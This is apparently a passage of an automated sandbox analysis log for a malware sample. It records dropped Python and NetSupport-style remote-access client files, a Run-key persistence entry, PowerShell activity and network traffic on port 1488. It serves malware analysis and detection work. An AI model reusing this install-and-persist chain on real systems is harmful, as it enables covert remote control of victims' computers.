                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2041453144.00007FFDFABA0000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAFF1000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: BUenB12U2a.exe, 00000001.00000002.2043270847.00007FFDFB134000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\PCICL32.pdb source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\AudioCapture\Release\AudioCapture.pdb source: BUenB12U2a.exe, 00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012237313.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2010748148.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2019629636.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAFF1000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: BUenB12U2a.exe, 00000001.00000002.2043708725.00007FFDFB50B000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdbN source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdbIsDBCSLeadByte4CompareStringAH source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdbP@ source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047237276.00007FFE11EBC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047703009.00007FFE130C3000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792443499.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031012733.0000020E46B20000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0x74DC4D47 [Tue Feb 17 01:39:19 2032 UTC]
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_1070CC8F LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_1070CC8F
                                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                                Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
                                Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
                                Source: python311.dll.0.drStatic PE information: section name: PyRuntim
                                Source: ucrtbase.dll.0.drStatic PE information: section name: fothk
                                Source: ucrtbase.dll.0.drStatic PE information: section name: .fptable
                                Source: PCICL32.DLL.1.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA834AEE push 6FFDC5D5h; iretd 1_2_00007FFDFA834AF4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA8376D3 push 6FFDC5D5h; iretd 1_2_00007FFDFA8376D9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA834FEA push 6FFDC5C3h; iretd 1_2_00007FFDFA834FF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA837425 push 60F5C5F1h; iretd 1_2_00007FFDFA83742D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA834F9E push 6FFDC5CAh; ret 1_2_00007FFDFA834FA4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA834640 push 60F5C5F1h; iretd 1_2_00007FFDFA834648
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA837983 push 6FFDC5CAh; ret 1_2_00007FFDFA837989
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA8379CF push 6FFDC5C3h; iretd 1_2_00007FFDFA8379D5
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D4021 push rcx; ret 1_2_00007FFDFB0D4022
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9A71D2A5 pushad ; iretd 3_2_00007FFD9A71D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9A8309AD push E85E505Dh; ret 3_2_00007FFD9A8309F9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10705B60 push eax; ret 6_2_10705B8E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9BB99C push edi; ret 6_2_6C9BB9AB
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9B59A7 push 3BFFFFFFh; retf 6_2_6C9B59AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9B6AF5 push ecx; ret 6_2_6C9B6B08
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9BBA27 push edi; ret 6_2_6C9BBA29
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9C41EF push ecx; ret 6_2_6C9C4202
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB82D80 push eax; ret 6_2_6CB82D9E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C8CD push edx; ret 6_2_6CB9C8CE
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C804 push ebx; ret 6_2_6CB9C826
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB90995 push ecx; ret 6_2_6CB909A8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C904 push edx; ret 6_2_6CB9C90E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBAA6AA push EF3FEFD4h; iretd 6_2_6CBAA6B1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C7E6 push ebx; ret 6_2_6CB9C802
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C7D0 push ebx; ret 6_2_6CB9C7D2
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA9CD8 pushad ; iretd 6_2_6CBA9CE6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9BF60 push ecx; ret 6_2_6CB9BF73
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA1831 push edi; ret 6_2_6CBA1832
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB995D5 push eax; ret 6_2_6CB995D6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB99619 push eax; ret 6_2_6CB9961A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC7ED5B push 3BFFFFFEh; ret 6_2_6CC7ED66
                                Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-kernel32-legacy-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\pyexpat.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\select.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\libcrypto-3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\python3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\ucrtbase.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\client32.exeJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_elementtree.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\python311.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_queue.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-sysinfo-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_socket.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_lzma.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_bz2.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_ssl.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_decimal.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\libffi-8.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\libssl-3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil\_psutil_windows.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A4F80 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,6_2_6C9A4F80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C993F40 GetPrivateProfileIntA,6_2_6C993F40
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C993B90 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_6C993B90
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C993BC7 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_6C993BC7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A5318 GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,6_2_6C9A5318
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client32

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD67AB0 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,6_2_6CD67AB0
